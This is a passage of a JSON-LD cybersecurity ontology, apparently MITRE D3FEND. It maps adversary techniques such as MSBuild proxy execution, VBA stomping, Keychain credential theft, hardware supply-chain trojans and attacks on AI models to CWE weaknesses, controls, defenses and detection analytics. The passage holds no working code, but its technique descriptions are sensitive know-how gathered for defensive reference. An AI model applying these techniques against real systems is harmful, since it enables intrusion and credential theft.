      "rdfs:label": "CCI-002355"
    },
    {
      "@id": "d3f:M1027",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:One-timePassword"
        },
        {
          "@id": "d3f:StrongPasswordPolicy"
        }
      ],
      "rdfs:label": "Password Policies"
    },
    {
      "@id": "d3f:CWE-230",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-230",
      "d3f:definition": "The product does not handle or incorrectly handles when a parameter, field, or argument name is specified, but the associated value is missing, i.e. it is empty, blank, or null.",
      "rdfs:label": "Improper Handling of Missing Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-229"
      }
    },
    {
      "@id": "d3f:Reference-CommandLaunchedFromWinLogon_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-11-008/"
      },
      "d3f:kb-abstract": "An adversary can use accessibility features (Ease of Access), such as StickyKeys or Utilman, to launch a command shell from the logon screen and gain SYSTEM access. Since an adversary does not have physical access to the machine, this technique must be run within Remote Desktop. To prevent an adversary from getting to the login screen without first authenticating, Network-Level Authentication (NLA) must be enabled. If a debugger is set up for one of the accessibility features, then it will intercept the process launch of the feature and instead execute a new command line. This analytic looks for instances of cmd.exe or powershell.exe launched directly from the logon process, winlogon.exe. It should be used in tandem with CAR-2014-11-003, which detects the accessibility programs in the command line.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessLineageAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-11-008: Command Launched from WinLogon",
      "rdfs:label": "Reference - CAR-2014-11-008: Command Launched from WinLogon - MITRE"
    },
    {
      "@id": "d3f:T1127.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1127.001",
      "d3f:definition": "Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)",
      "d3f:modifies": {
        "@id": "d3f:CompilerConfigurationFile"
      },
      "d3f:runs": {
        "@id": "d3f:Compiler"
      },
      "rdfs:label": "MSBuild",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1127"
        },
        {
          "@id": "_:N532a507150ae47f48a29c7be90156b2e"
        },
        {
          "@id": "_:N1e5533d7c1ba4afda4cab8690347e396"
        }
      ]
    },
    {
      "@id": "_:N532a507150ae47f48a29c7be90156b2e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CompilerConfigurationFile"
      }
    },
    {
      "@id": "_:N1e5533d7c1ba4afda4cab8690347e396",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Compiler"
      }
    },
    {
      "@id": "d3f:CWE-842",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-842",
      "d3f:definition": "The product or the administrator places a user into an incorrect group.",
      "rdfs:label": "Placement of User into Incorrect Group",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-286"
      }
    },
    {
      "@id": "d3f:Reference-ContinuousAuthenticationByAnalysisOfKeyboardTypingCharacteristics_BradfordUniv.,UK",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://ieeexplore.ieee.org/document/491588?reload=true&arnumber=491588"
      },
      "d3f:kb-abstract": "This paper describes a simple, software based keyboard monitoring system for the IBM PC for the continuous analysis of the typing characteristics of the user for the purpose of continuous authentication. By exploiting the electrical characteristics of the PC keyboard interface together with modifications to the internal system timer, very accurate measurements can be made of keystroke interval and duration, including measurements of rollover. Rollover patterns, particularly when typing common diphthongs, can be highly characteristic of individual users and provide quite an accurate indication of the users identity.\nPublished in: European Convention on Security and Detection, 1995.",
      "d3f:kb-author": "S.J. Shepherd",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Bradford Univ., UK",
      "d3f:kb-reference-of": {
        "@id": "d3f:InputDeviceAnalysis"
      },
      "d3f:kb-reference-title": "Continuous authentication by analysis of keyboard typing characteristics",
      "rdfs:label": "Reference - Continuous authentication by analysis of keyboard typing characteristics - Bradford Univ., UK"
    },
    {
      "@id": "d3f:T1564.007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1564.007",
      "d3f:definition": "Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)",
      "d3f:modifies": {
        "@id": "d3f:OfficeApplicationFile"
      },
      "rdfs:label": "VBA Stomping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1564"
        },
        {
          "@id": "_:N376c0e1ba8e8400da30f540830f767b2"
        }
      ]
    },
    {
      "@id": "_:N376c0e1ba8e8400da30f540830f767b2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OfficeApplicationFile"
      }
    },
    {
      "@id": "d3f:has-contributor",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "has-contributor",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-object-property"
      }
    },
    {
      "@id": "d3f:AML.T0075",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0075",
      "d3f:definition": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.\n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.[1][2]\n\nFor example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.[3][4]\n\nAdversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through Disable or Modify Tools or Disable or Modify Cloud Logs.",
      "rdfs:label": "Cloud Service Discovery - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0075"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDiscoveryTechnique"
      },
      "skos:prefLabel": "Cloud Service Discovery"
    },
    {
      "@id": "d3f:FileAccessEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is accessed for operations such as reading, opening, or inspecting its contents or metadata, without necessarily modifying its state.",
      "rdfs:label": "File Access Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileEvent"
        },
        {
          "@id": "_:Nd3fca8de645041f3a090c3a368b5f261"
        },
        {
          "@id": "_:N9d535daee12144129eb2de02bda8e490"
        }
      ]
    },
    {
      "@id": "_:Nd3fca8de645041f3a090c3a368b5f261",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FilePathOpenFunction"
      }
    },
    {
      "@id": "_:N9d535daee12144129eb2de02bda8e490",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileCreationEvent"
      }
    },
    {
      "@id": "d3f:VehicleOperatingMode",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Vehicle Operating Mode",
      "rdfs:subClassOf": {
        "@id": "d3f:OperatingMode"
      }
    },
    {
      "@id": "d3f:AML.TA0002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0002",
      "d3f:definition": "The adversary is trying to gather information about the AI system they can use to plan future operations.\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting.\nSuch information may include details of the victim organizations' AI capabilities and research efforts.\nThis information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to obtain relevant AI artifacts, targeting AI capabilities used by the victim, tailoring attacks to the particular models used by the victim, or to drive and lead further Reconnaissance efforts.",
      "rdfs:label": "Reconnaissance - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0002"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Reconnaissance"
    },
    {
      "@id": "d3f:CWE-1069",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1069",
      "d3f:definition": "An invokable code block contains an exception handling block that does not contain any code, i.e. is empty.",
      "rdfs:label": "Empty Exception Block",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1071"
      }
    },
    {
      "@id": "d3f:T0892",
      "@type": "owl:Class",
      "d3f:attack-id": "T0892",
      "d3f:definition": "Adversaries may modify software and device credentials to prevent operator and responder access. Depending on the device, the modification or addition of this password could prevent any device configuration actions from being accomplished and may require a factory reset or replacement of hardware. These credentials are often built-in features provided by the device vendors as a means to restrict access to management interfaces.",
      "rdfs:label": "Change Credential - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Change Credential"
    },
    {
      "@id": "d3f:RadiationHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RadiationHardening"
      ],
      "d3f:d3fend-id": "D3-RH",
      "d3f:definition": "Radiation hardening is the process of making electronic components and circuits resistant to damage or malfunction caused by high levels of ionizing radiation.",
      "d3f:hardens": {
        "@id": "d3f:HardwareDevice"
      },
      "d3f:kb-article": "## How it works\n\nThere are three core radiation hardening methodologies:\n\n1. Radiation Hardening by Process (RHBP): modifying the physical fabrication of a semiconductor (e.g., using SOI - Silicon on Insulator), offering the highest intrinsic protection. Usually the most expensive option as it requires a specialized semiconducter fabrication plant.\n2. Radiation Hardening by Design (RHBD): modifying circuit topology and physical layout using techniques such as Triple Modular Redundancy (TMM). A more cost-effective option, with the constraint of potentially increasing chip area and power.\n3. Radiation Hardening by Shielding (RHBS): using physical materials (e.g., aluminum or tantalum) to block ionizing particles. Simple to implement, with the constraint of increasing size and weight.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-ARadiationHardenedSARADCWithDelayBasedDualFeedbackFlipFlopsForSensorReadoutSystems"
        },
        {
          "@id": "d3f:Reference-DiagnosisOfFaultsInducedByRadiationAndCircuitLevelDesignMitigationTechniques"
        },
        {
          "@id": "d3f:Reference-MethodOfMakingThinAtomicZGradeShields"
        }
      ],
      "rdfs:label": "Radiation Hardening",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformHardening"
        },
        {
          "@id": "_:N730e0fa5309b42feaf7c6ffdb37a8e8f"
        }
      ]
    },
    {
      "@id": "_:N730e0fa5309b42feaf7c6ffdb37a8e8f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:CWE-374",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-374",
      "d3f:definition": "The product sends non-cloned mutable data as an argument to a method or function.",
      "rdfs:label": "Passing Mutable Objects to an Untrusted Method",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:IA-0001.03",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0001.03",
      "d3f:definition": "Adversaries alter boards, modules, or programmable logic prior to delivery to create latent access or reliability sabotage. Tactics include inserting hardware Trojans in ASIC/FPGA designs, modifying bitstreams or disabling security fuses, leaving debug interfaces (JTAG/SWD/UART) active, substituting near-spec counterfeits, or embedding parts that fail after specific environmental or temporal conditions (“time-bomb” components). Other avenues target programming stations and “golden” images so entire lots inherit the same weakness. Microcontroller boot configurations, peripheral EEPROMs, and supervisory controllers are common leverage points because small changes there can reshape trust boundaries across the bus. The effect is a platform that behaves nominally through acceptance test yet enables covert control, targeted degradation, or delayed failure once on orbit.",
      "rdfs:label": "Hardware Supply Chain - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0001/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0001"
      },
      "skos:prefLabel": "Hardware Supply Chain"
    },
    {
      "@id": "d3f:kb-abstract",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "x kb-abstract y: The reference x has the abstract y.",
      "rdfs:domain": {
        "@id": "d3f:TechniqueReference"
      },
      "rdfs:label": "kb-abstract",
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-reference-annotation"
      }
    },
    {
      "@id": "d3f:Reference-RemotelyScheduledTasksViaSchtasks_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2015-04-002/"
      },
      "d3f:kb-abstract": "An adversary can move laterally using the schtasks command to remotely schedule tasks. Although these events can be detected with command line analytics CAR-2013-08-001, it is possible for an adversary to use the API directly, via the Task Scheduler GUI or with a scripting language such as PowerShell. In this cases, an additional source of data becomes necessary to detect adversarial behavior. When scheduled tasks are created remotely, Windows uses RPC (135/tcp) to communicate with the Task Scheduler on the remote machine. Once an RPC connection is established (CAR-2014-05-001), the client communicates with the Scheduled Tasks endpoint, which runs within the service group netsvcs. With packet capture and the right packet decoders or byte-stream based signatures, remote invocations of these functions can be identified.\n\nCertain strings can be identifiers of the schtasks, by looking up the interface UUID of ITaskSchedulerService in different formats\n\n* UUID 86d35949-83c9-4044-b424-db363231fd0c (decoded)\n* Hex 49 59 d3 86 c9 83 44 40 b4 24 db 36 32 31 fd 0c (raw)\n* ASCII IYD@$621 (printable bytes only)\n\nThis identifier is present three times during the RPC request phase. Any sensor that has access to the byte code as raw, decoded, or ASCII could implement this analytic.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:RPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2015-04-002: Remotely Scheduled Tasks via Schtasks",
      "rdfs:label": "Reference - CAR-2015-04-002: Remotely Scheduled Tasks via Schtasks - MITRE"
    },
    {
      "@id": "d3f:PrivateKey",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A private key can be used to decrypt messages encrypted using the corresponding public key, or used to sign a message that can be authenticated with the corresponding public key.",
      "d3f:has-dependent": {
        "@id": "d3f:PublicKey"
      },
      "rdfs:label": "Private Key",
      "rdfs:seeAlso": {
        "@id": "dbr:Public-key_cryptography"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AsymmetricKey"
        },
        {
          "@id": "_:N4cc39d888ef3421c8e58a5157cf0ede1"
        }
      ]
    },
    {
      "@id": "_:N4cc39d888ef3421c8e58a5157cf0ede1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-dependent"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PublicKey"
      }
    },
    {
      "@id": "d3f:WatchdogTimerConfigurationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which a watchdog timer's timeout period or recovery action is configured.",
      "rdfs:label": "Watchdog Timer Configuration Event",
      "rdfs:subClassOf": {
        "@id": "d3f:WatchdogTimerEvent"
      }
    },
    {
      "@id": "d3f:WindowsNtSetInformationFileArgumentFileDispositionInformation",
      "@type": "owl:Class",
      "d3f:definition": "Request to delete the file when it is closed or cancel a previously requested deletion.",
      "rdfs:label": "Windows NtSetInformationFile Argument FileDispositionInformation",
      "rdfs:seeAlso": {
        "@id": "https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntsetinformationfile"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIDeleteFile"
      }
    },
    {
      "@id": "d3f:CCI-001239_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:FileAnalysis"
        },
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "d3f:ProcessAnalysis"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs malicious code protection mechanisms at information system entry and exit points to detect and eradicate malicious code transported by electronic mail, electronic mail attachments, web accesses, removable media, or other common means or inserted through the exploitation of information system vulnerabilities.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001239"
    },
    {
      "@id": "d3f:T1555.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:MacOSKeychain"
      },
      "d3f:attack-id": "T1555.001",
      "d3f:definition": "Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service.",
      "rdfs:label": "Keychain",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1555"
        },
        {
          "@id": "_:N4a87e010520341fa9641e4b74c060120"
        }
      ]
    },
    {
      "@id": "_:N4a87e010520341fa9641e4b74c060120",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MacOSKeychain"
      }
    },
    {
      "@id": "d3f:CWE-493",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-493",
      "d3f:definition": "The product has a critical public variable that is not final, which allows the variable to be modified to contain unexpected values.",
      "rdfs:label": "Critical Public Variable Without Final Modifier",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:Reference-PrivacyAndSecuritySystemsAndMethodsOfUse",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10128890B2/en"
      },
      "d3f:kb-author": "Teddy David Thomas",
      "d3f:kb-reference-title": "Privacy and security systems and methods of use",
      "rdfs:label": "Reference - Privacy and security systems and methods of use"
    },
    {
      "@id": "d3f:ExactMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-EM",
      "d3f:definition": "Exact matching for numeric types is just the simple test for mathematical equivalence of the values being matched.",
      "d3f:kb-article": "## References\n1. Equality (mathematics). (2023, May 31). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Equality_(mathematics)]",
      "d3f:synonym": "Numeric Equivalence Matching",
      "rdfs:label": "Exact Matching",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EquivalenceMatching"
        },
        {
          "@id": "d3f:NumericPatternMatching"
        }
      ]
    },
    {
      "@id": "d3f:CCI-000771_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uses multifactor authentication for network access to privileged accounts where one of the factors is provided by a device separate from the information system being accessed.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000771"
    },
    {
      "@id": "d3f:CWE-112",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-112",
      "d3f:definition": "The product accepts XML from an untrusted source but does not validate the XML against the proper schema.",
      "rdfs:label": "Missing XML Validation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1286"
      }
    },
    {
      "@id": "d3f:CWE-342",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-342",
      "d3f:definition": "An exact value or random number can be precisely predicted by observing previous values.",
      "rdfs:label": "Predictable Exact Value from Previous Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-340"
      }
    },
    {
      "@id": "d3f:ReadFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A program that needs to access data from a file stored in a file system uses the read system call. The file is identified by a file descriptor that is normally obtained from a previous call to open. This system call reads in data in bytes, the number of which is specified by the caller, from the file and stores then into a buffer supplied by the calling process.",
      "d3f:reads": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Read File",
      "rdfs:seeAlso": {
        "@id": "dbr:Read_(system_call)"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Ncb65c6247dd845a58029eebd91398d7d"
        }
      ]
    },
    {
      "@id": "_:Ncb65c6247dd845a58029eebd91398d7d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:reads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:LateralMovementTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to move through your environment.",
      "d3f:enables": {
        "@id": "d3f:TA0008"
      },
      "rdfs:label": "Lateral Movement Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N0519a76fe6bf409786483e969616c0fd"
        }
      ]
    },
    {
      "@id": "_:N0519a76fe6bf409786483e969616c0fd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0008"
      }
    },
    {
      "@id": "d3f:AML.T0042",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0042",
      "d3f:definition": "Adversaries can verify the efficacy of their attack via an inference API or access to an offline copy of the target model.\nThis gives the adversary confidence that their approach works and allows them to carry out the attack at a later time of their choosing.\nThe adversary may verify the attack once but use it against many edge devices running copies of the target model.\nThe adversary may verify their attack digitally, then deploy it in the [Physical Environment Access](/techniques/AML.T0041) at a later time.\nVerifying the attack may be hard to detect since the adversary can use a minimal number of queries or an offline copy of the model.",
      "rdfs:label": "Verify Attack - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0042"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASAIAttackStagingTechnique"
      },
      "skos:prefLabel": "Verify Attack"
    },
    {
      "@id": "d3f:InterprocessCommunication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computer science, inter-process communication or inter-process communication (IPC) refers specifically to the mechanisms an operating system provides to allow processes it manages to share data. Typically, applications can use IPC categorized as clients and servers, where the client requests data and the server responds to client requests. Many applications are both clients and servers, as commonly seen in distributed computing. Methods for achieving IPC are divided into categories which vary based on software requirements, such as performance and modularity requirements, and system circumstances, such as network bandwidth and latency.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Inter-process_communication"
      },
      "rdfs:label": "Interprocess Communication",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:OTExceptionMessageEvent",
      "@type": "owl:Class",
      "d3f:definition": "An unknown or anomalous condition occurred in the system.",
      "rdfs:label": "OT Exception Message Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDiagnosticsMessageEvent"
        },
        {
          "@id": "_:N0aa6070ef5494e3a80f2b56fd833966d"
        }
      ]
    },
    {
      "@id": "_:N0aa6070ef5494e3a80f2b56fd833966d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTExceptionMessage"
      }
    },
    {
      "@id": "d3f:StatisticalMethod",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SM",
      "d3f:definition": "Building methods using the mathematical study of the likelihood and probability of events occurring based on known information and inferred by taking a limited number of samples.",
      "d3f:kb-article": "## References\nWolfram MathWorld. (n.d.). Statistics. [Link](https://mathworld.wolfram.com/Statistics.html)",
      "rdfs:label": "Statistical Method",
      "rdfs:subClassOf": {
        "@id": "d3f:AnalyticTechnique"
      }
    },
    {
      "@id": "d3f:CWE-1294",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1294",
      "d3f:definition": "The System-on-Chip (SoC) implements a Security Identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Identifiers are not correctly implemented.",
      "rdfs:label": "Insecure Security Identifier Mechanism",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:OperationalActivityMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OperationalActivityMapping"
      ],
      "d3f:d3fend-id": "D3-OAM",
      "d3f:definition": "Operational activity mapping identifies activities of the organization and the organization's suborganizations, groups, roles, and individuals that carry out the activities and then establishes the dependencies of the activities on the systems and people that perform those activities.",
      "d3f:enables": {
        "@id": "d3f:Model"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CatiaUAFPlugin"
      },
      "d3f:synonym": "Mission Mapping",
      "rdfs:label": "Operational Activity Mapping",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:Nf497256fb6bf4e349f7064cbd778015f"
        }
      ]
    },
    {
      "@id": "_:Nf497256fb6bf4e349f7064cbd778015f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Model"
      }
    },
    {
      "@id": "d3f:CCI-002233_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents organization-defined software from executing at higher privilege levels than users executing the software.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002233"
    },
    {
      "@id": "d3f:Reference-ProtocolBasedDetectionOfSuspiciousNetworkTraffic",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10084816B2/"
      },
      "d3f:kb-abstract": "Embodiments of the present invention relate to identification of suspicious network traffic indicative of a Botnet and/or an Advanced Persistent Threat (APT) based on network protocol of such traffic. According to one embodiment, a traffic file is received at a network security device that is protecting a private network. The traffic file contains therein network traffic associated with the private network that has been captured and stored. The received traffic file is processed by the network security device to determine whether the network traffic relates to a network protocol that is indicative of existence of a network security threat within the private network. When existence of the network security threat is detected, then the network security device reports details regarding the network security threat.",
      "d3f:kb-organization": "Fortinet",
      "d3f:kb-reference-of": {
        "@id": "d3f:ApplicationProtocolCommandAnalysis"
      },
      "d3f:kb-reference-title": "Protocol based detection of suspicious network traffic",
      "rdfs:label": "Reference - Protocol based detection of suspicious network traffic"
    },
    {
      "@id": "d3f:T1485.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1485.001",
      "d3f:definition": "Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within.",
      "rdfs:label": "Lifecycle-Triggered Deletion",
      "rdfs:subClassOf": {
        "@id": "d3f:T1485"
      }
    },
    {
      "@id": "d3f:VectorImage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A graphical image created using mathematical equations and geometric shapes defined by vectors.",
      "rdfs:label": "Vector Image",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalImage"
      }
    },
    {
      "@id": "d3f:M1019",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "Establishing and running a Threat Intelligence Program is outside the scope of D3FEND.",
      "rdfs:label": "Threat Intelligence Program"
    },
    {
      "@id": "d3f:HTTPGetEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the HTTP GET method is used to request a representation of the specified resource.",
      "rdfs:label": "HTTP GET Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HTTPRequestEvent"
      }
    },
    {
      "@id": "d3f:CWE-1024",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1024",
